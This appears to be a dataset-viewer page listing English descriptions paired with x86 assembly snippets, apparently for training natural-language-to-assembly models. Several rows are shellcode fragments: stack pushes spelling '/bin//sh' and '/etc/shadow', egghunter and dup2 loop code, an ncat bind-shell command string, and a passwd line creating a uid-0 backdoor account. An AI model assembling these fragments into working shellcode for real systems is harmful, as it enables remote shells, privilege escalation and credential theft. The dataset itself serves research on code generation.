stringlengths 4
| snippet
stringlengths 2
allocate my_table vector of 10 words each initialized to 0 | my_table times 10 dw 0 |
place the value in var in eax | lea eax, [var] |
copy my_var contents in ax | mov ax, [my_var] |
push the 0x70692f6e onto the stack | push 0x70692f6e |
move 0xc into dl | mov dl, 0xc |
move the byte in esi into bl | mov bl, byte [esi] |
zero out the ebx register | xor ebx, ebx |
move 0x7f into dl | mov dl, 0x7f |
push the word 0644o onto the stack | push word 0644o |
jump short to the formatting label | jmp short formatting |
call the egghunter function | call egghunter |
set the new base pointer | mov ebp, esp |
copy the value in var1 into the doubleword starting at the address in eax | mov dword [eax], var1 |
jump short to the search label | jmp short search |
move the contents at memory address x to ecx | mov ecx, [x] |
preserve ebx on the stack | push ebx |
section for initialized data | section .data |
jump to the label proc_name if the contents of the eax register is zero | test eax, eax \n jz proc_name |
move the contents at the memory location specified by the result of the operation [ebp-4] into the ebx register | mov ebx, [ebp-4] |
decrement the ecx register and jump to the L3 label if the contents of the ecx register is not zero and the zero flag is zero else move the value 7 into the edx register | loopnz L3 \n mov edx, 7 |
add 0xb to the al register | add al, 0xb |
push 0x6962732f onto the stack | push 0x6962732f |
define the byte string '/usr/bin/ncat#-lvp1337#-e/bin/bash#aaaabbbbccccdddd' | db '/usr/bin/ncat#-lvp1337#-e/bin/bash#aaaabbbbccccdddd' |
move /bin/sh into the ebx register | push long 0x68732f2f \n push long 0x6e69622f \n mov ebx, esp |
push hs// | push 0x68732f2f |
put the syscall 0xc into the eax register | push byte 0xc \n pop eax |
multiply the contents of eax by ebx | mul ebx |
push the byte 0x1c onto the stack | push byte 0x1c |
init ebx 0 | xor ebx, ebx |
invoke sys_write | mov eax, 4 |
if the byte starting at the address contained in the esi register is lower than or equal to the byte value 0xD then jump to the wrap_around label | cmp byte [esi], 0xD \n jle wrap_around |
call the near function | call near stageaddress |
push 0x74303072 onto the stack | push 0x74303072 |
push the value 0x6e7a762d onto the stack and point the ebp register to the stack register | push 0x6e7a762d \n mov ebp, esp |
jump to the l2 label if the byte starting at the address contained in the edx register is not equal to the byte value 0x2e else jump to the while label | cmp BYTE [edx], 0x2e \n jne l2 \n jmp while |
push the value 0x6374652f onto the stack and point ecx to the stack register | push 0x6374652f \n mov ecx, esp |
push the byte -1 onto the stack | push byte -1 |
push the value 0x6873732f and the value 0x6374652f onto the stack and point the edi register to the stack register | push 0x6873732f \n push 0x6374652f \n mov edi, esp |
jump to 0x8 if zero | jz 0x8 |
push 0x4f4e2029 onto the stack | push 0x4f4e2029 |
move 0x16a into ax | mov ax, 0x16a |
reserve 1 double word for variableName3 | variablename3: resd 1 |
jump short to call_shellcode | jmp short call_shellcode |
divide eax by ecx the result of the division is stored in eax and the remainder in edx | div ecx |
move the byte 6h into al | mov al, byte 6h |
move the address in eax into ebx | mov ebx, eax |
jump to 2f if the sign flag is zero | jns 2f |
compare the value in eax to the doubleword addressed by edi | scasd |
push 0x6 onto the stack | push 0x6 |
move the byte in edi into the al register | mov al, byte [edi] |
put the syscall 0x05 into the eax register | push byte 0x05 \n pop eax |
move 0xb33fb33f into eax | mov eax, 0xb33fb33f |
define the callme label | callme: |
zero out the ecx register and push zero onto the stack | xor ecx, ecx \n push ecx |
push the byte 0x30 onto the stack | push byte 0x30 |
add 0x10 to eax | add eax, 0x10 |
if 0 then jump to loc_402b13 | jz short loc_402b13 |
push the byte 0x3f onto the stack | push byte 0x3f |
subtract 0x7ff from the contents of cx register value and save the result in cx | sub cx, 0x7ff |
push the word 0x632d onto the stack and point the ebx register to the stack register | push word 0x632d \n mov ebx, esp |
define the call_egghunter label | call_egghunter: |
move 99 into al | mov al, 99 |
divide eax by 2 using right shift | shr eax, 1 |
move the contents of the bx register at the memory location specified by the operation [bp+0x36] | mov [bp+0x36], bx |
clear the ecx register and push its contents onto the stack | xor ecx, ecx \n push ecx |
move the contents of ecx into the memory location specified by the operation [ebp+12] | mov [ebp+12], ecx |
right shift the contents of the edi register by the contents of the cl register | shr ax, cl |
if the contents of the cl register is equal to the contents of the dl register then jump to the init label else increment the contents of the cl register | cmp cl, dl \n je init \n inc cl |
push the dword 0x6164732f onto the stack | push dword 0x6164732f |
place the value val in eax | lea eax, [val] |
write to the file | mov eax, 4 |
move 39 into al | mov al, 39 |
clear edx register | xor edx, edx |
jump to the while label if the doubleword starting at the address contained in the edx register is equal to the doubleword value 0x636f7270 | cmp DWORD [edx], 0x636f7270 \n je while |
declare the fill label | fill: |
declare the len label equal to the size of the google variable | len: equ $-google |
define the callpop function | callpop: |
decrement esp | dec esp |
make the system call to set set signal delivery alarm clock | mov eax, 27 |
load the value of register ebx into register esp | lea esp, [ebx] |
load the effective address of the result of the operation [ebp+24] into the ebx register | lea ebx, [ebp+24] |
move bl into the byte at address [esi+ecx] | mov byte [esi+ecx], bl |
define the array of bytes shellcode and initialize it to vl43ck:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:vl43ck:/tmp:/bin/bash | shellcode: db 'vl43ck:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:vl43ck:/tmp:/bin/bash' |
push 0x6769666e onto the stack | push 0x6769666e |
zero out ebx | xor ebx, ebx |
move 2001 into cx | mov cx, 2001 |
jump to the _next label if the doubleword starting at the address [eax-4] is equal to the contents stored at the egg2 address else jump to the eax register | cmp dword [eax-4], egg2 \n je _next \n jmp eax |
move the contents of the ebp register into the esp register | mov esp, ebp |
if the contents of the eax register is negative then jump to the label close | test eax, eax \n js close |
add decimal integer 5 to ebx | add ebx, 5 |
push 0x3a303a3a onto the stack | push 0x3a303a3a |
push the word 0x662d onto the stack and point the ecx register to the stack register | push word 0x662d \n mov ecx, esp |
move ecx into ebx | mov ebx, ecx |
declare of the global _star | global _star |
push the value 0x6873732f onto the stack | push 0x6873732f |
move the memory address of contents variable into ecx | mov ecx, contents |
jump to the label not_found if the contents of the bl register is not zero | test bl, bl \n jz not_found |
perform logical and between ax and 1 | and ax, 1 |
decrement ecx by 1 and jump to the dup2loop procedure until ecx equals 0 | dec ecx \n jns dup2loop |
add 16 to eax | add eax, 16 |
Subsets and Splits